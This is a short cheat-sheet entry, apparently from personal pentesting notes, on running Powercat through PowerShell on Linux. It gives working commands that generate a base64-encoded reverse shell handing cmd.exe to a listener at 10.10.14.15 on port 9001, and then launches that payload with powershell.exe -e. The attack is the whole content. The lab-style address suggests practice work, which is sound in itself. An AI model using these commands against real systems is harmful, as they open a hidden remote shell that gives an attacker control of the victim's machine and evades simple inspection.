Skip to main content

Powercat

Powercat on Linux

Have pwsh running on linux and launch powershell $ pwsh command

powercat - generated reverse shell Encoded

powercat -c 10.10.14.15 -p 9001 -e cmd.exe -ge > en_rev91.ps1

-ge option to generate base64 Encoded

executing the above output to get the reverse shell

powershell.exe -e <content-of-en_rev91.ps1-file>